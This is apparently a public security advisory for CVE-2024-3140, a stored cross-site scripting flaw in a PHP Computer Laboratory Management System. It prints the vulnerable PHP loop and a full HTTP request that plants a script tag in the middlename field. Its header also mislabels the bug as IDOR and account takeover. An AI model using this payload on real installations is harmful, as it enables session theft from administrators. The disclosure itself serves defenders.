Computer Laboratory Management System 1.0 Cross Site Scripting

`#Vulnerability Details:  
#Application Name: Computer Laboratory Management System  
#Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html  
#Vendor Homepage: https://www.sourcecodester.com/users/tips23  
#BuG: Insecure Direct Object References (IDOR) and Account Takeover  
#BuG_Author: SoSPiro  
#CVE: CVE-2024-3140  
  
# Vulnerable code section:  
  
foreach($_POST as $k => $v){  
$v = $this->conn->real_escape_string($v);  
if(in_array($k, $main_field)){  
if(!empty($data)) $data .= ", ";  
$data .= " `{$k}` = '{$v}' ";  
}  
}  
  
- The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.  
  
# Vulnerability Description:  
  
- The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack.  
  
  
# Proof of Concept (PoC):  
  
- Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing  
  
  
- Request:  
  
  
POST /php-lms/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571  
Content-Length: 946  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/php-lms/admin/?page=user  
Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
X-PwnFox-Color: green  
  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="id"  
  
8  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="firstname"  
  
staff2  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="middlename"  
  
<script>alert(1)</script>  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="lastname"  
  
asd  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="username"  
  
staff  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="password"  
  
  
-----------------------------381104392340117332004262429571  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------381104392340117332004262429571--  
  
- In this POST request, an attacker has included a script tag in the "middlename" field:  
  
<script>alert(1)</script>  
  
- When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application.  
  
  
  
# Impact:  
  
- The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users.  
  
  
  
# Reproduce:  
  
https://github.com/Sospiro014/zday1/blob/main/xss_1.md  
https://vuldb.com/?id.258915  
https://www.cve.org/CVERecord?id=CVE-2024-3140  
  
  
  
`